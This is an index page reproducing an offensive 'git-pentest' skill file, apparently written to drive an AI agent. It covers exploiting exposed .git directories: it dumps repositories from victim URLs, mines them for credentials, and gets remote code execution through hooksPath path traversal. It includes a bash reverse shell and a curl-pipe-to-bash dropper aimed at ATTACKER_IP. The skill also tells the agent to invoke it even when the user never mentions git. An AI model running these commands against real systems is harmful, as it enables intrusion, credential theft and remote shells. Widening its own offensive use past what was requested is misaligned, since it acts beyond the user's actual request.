OpenSkillIndex← back to search

Hacktricks-skills git-pentest

How to exploit exposed .git directories in web applications. Use this skill whenever the user mentions .git exposure, git directory dumping, git secrets, git-based pentesting, or wants to extract sensitive data from exposed version control. Make sure to use this skill for any web app security testing where .git folders might be accessible, even if the user doesn't explicitly mention 'git' - they might just say 'exposed directory' or 'download repo from web'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/git/SKILL.MD
source content

Git Pentesting Skill

This skill helps you exploit exposed 

.git
directories in web applications to extract sensitive data, credentials, and potentially achieve remote code execution.

When to Use This Skill

Use this skill when:

  • You discover an exposed 
    .git
    directory on a web application
  • You need to dump and analyze git repositories from URLs
  • You want to hunt for secrets, credentials, or sensitive data in git history
  • You're testing for git-based vulnerabilities in web applications
  • You need to understand git hook exploitation techniques

Quick Start

1. Dump the .git Directory

If you find an exposed 

.git
directory, use one of these methods:

Method A: Using git-dumper (recommended, fastest)

python3 git-dumper.py https://victim.com/.git/ output_dir
cd output_dir
git checkout -- .

Method B: Using wget (basic)

wget -r https://victim.com/.git/

Method C: Using DVCS-Pillage

dvcs-pillage.py https://victim.com/.git/

2. Reconstruct and Analyze

Once you have the dump:

cd dump_directory

# Reconstruct working tree
git checkout -- .

# View commit history
git log --graph --oneline --decorate --all

# Check for suspicious configs
git config -l

# List hooks
git ls-files .git/hooks/

3. Hunt for Secrets

Use these tools to find credentials, API keys, and sensitive data:

TruffleHog (recommended for verified secrets)

trufflehog git file://$(pwd) --only-verified --json > secrets.json

Gitleaks (fast, good for initial scan)

gitleaks detect -v --source . --report-format json --report-path gitleaks.json

Gitrob (for organizational repos)

gitrob -r https://github.com/organization

Advanced: Server-Side Git RCE via hooksPath

If the target application integrates Git on the server side, you may be able to achieve remote code execution through hook manipulation.

Prerequisites

  • The application uses native Git (not JGit or similar libraries that ignore hooks)
  • You can control or influence 
    .git/config
    content
  • You can write to a directory that Git will use for hooks

Exploitation Steps

  1. Inject path traversal into hooksPath

    • Find where the app writes 
      .git/config
    • Inject 
      ../../..
      in repo/dependency names to escape the intended hooks directory
    • Example: 
      hooksPath = ../../git_hooks

  2. Force target directory creation

    • Abuse clone destination parameters
    • Use 
      ref
      /branch/path parameters to make the app clone into your traversal path
    • This creates intermediate folders for you

  3. Create executable hooks

    # Add your payload to pre-commit or post-commit
echo '#!/bin/bash' > pre-commit
echo 'YOUR_PAYLOAD_HERE' >> pre-commit

# Set executable bit in git metadata
git update-index --chmod=+x pre-commit
git add pre-commit
git commit -m "Add hook"

  4. Trigger the Git action

    • Find deployment flows or flags that use system Git
    • Spam the config rewrite endpoint while triggering Git actions to win race conditions

Common Payloads

Reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

File dropper:

#!/bin/bash
curl http://ATTACKER_IP/payload.sh | bash

Tool Reference

ToolPurposeCommand
git-dumperFast parallel .git dumping
python3 git-dumper.py URL output_dir
GitDumpBrute-force object recovery
python3 git-dump.py URL dump
DVCS-PillageGit directory extraction
dvcs-pillage.py URL
TruffleHogSecret detection
trufflehog git file://$PWD --only-verified
GitleaksFast secret scanning
gitleaks detect -v --source .
gitrobOrg-wide secret search
gitrob -r https://github.com/org
git-vuln-finderCVE search in commits
git-vuln-finder URL

Post-Exploitation Checklist

After dumping a 

.git
directory:

  • Reconstruct working tree with 
    git checkout -- .
  • Review commit history for sensitive changes
  • Scan for secrets with TruffleHog/Gitleaks
  • Check 
    .git/config
    for remote URLs and credentials
  • Examine hooks directory for existing hooks
  • Look for API keys, passwords, tokens in file history
  • Check for database connection strings
  • Review any configuration files in history

Example Workflow

Scenario: You find 

https://target.com/.git/
is accessible

# Step 1: Dump the repository
python3 git-dumper.py https://target.com/.git/ target_dump

# Step 2: Reconstruct
cd target_dump
git checkout -- .

# Step 3: Quick triage
git log --graph --oneline --decorate --all
git config -l

# Step 4: Hunt for secrets
trufflehog git file://$(pwd) --only-verified --json > secrets.json
gitleaks detect -v --source . --report-format json --report-path gitleaks.json

# Step 5: Review findings
cat secrets.json
cat gitleaks.json

Important Notes

  • Always verify findings - False positives are common in secret scanning
  • Respect scope - Only test systems you have authorization to assess
  • Document everything - Keep records of what you found and how
  • Consider the impact - Exposed .git directories often contain production credentials

References